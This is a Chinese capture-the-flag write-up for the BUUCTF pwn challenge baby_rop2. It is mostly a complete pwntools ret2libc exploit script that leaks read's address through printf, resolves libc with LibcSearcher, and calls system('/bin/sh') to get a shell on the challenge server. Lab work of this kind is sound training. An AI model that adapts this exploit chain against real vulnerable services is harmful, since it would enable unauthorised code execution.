[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2

• 題目地址：https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2

checksec一下,64位，開啟NX，應(yīng)該要用到ROPgadget，先看看

在IDA中

思路

利用printf先leek出來一個地址，這里選用了read的地址。找到libc，計算偏移，最終算出，system函數(shù)地址和’/bin/sh’字符串的地址。由于是64位，注意寄存器儲存參數(shù)。（參數(shù)小于等于六個時）。

exploit

from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",28500) elf = ELF("./babyrop2") printf_plt = elf.plt['printf'] read_got = elf.got['read'] main_addr = 0x0400636 pop_rdi = 0x0400733 pop_rsi_r15 = 0x0400731 format_addr = 0x00400770payload = 'a' * (0x20 + 0x8) payload += p64(pop_rdi) + p64(format_addr) payload += p64(pop_rsi_r15) + p64(read_got) + p64(8) payload += p64(printf_plt) + p64(main_addr) p.sendlineafter("What's your name? ",payload)read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))libc = LibcSearcher("read", read_addr)libc_base = read_addr - libc.dump("read") sys_addr = libc_base + libc.dump("system") binsh = libc_base + libc.dump("str_bin_sh")payload = 'a' * (0x20 + 0x8) payload += p64(pop_rdi) + p64(binsh) payload += p64(sys_addr) payload += '\x00' p.sendlineafter("What's your name? ",payload) p.recvline() p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。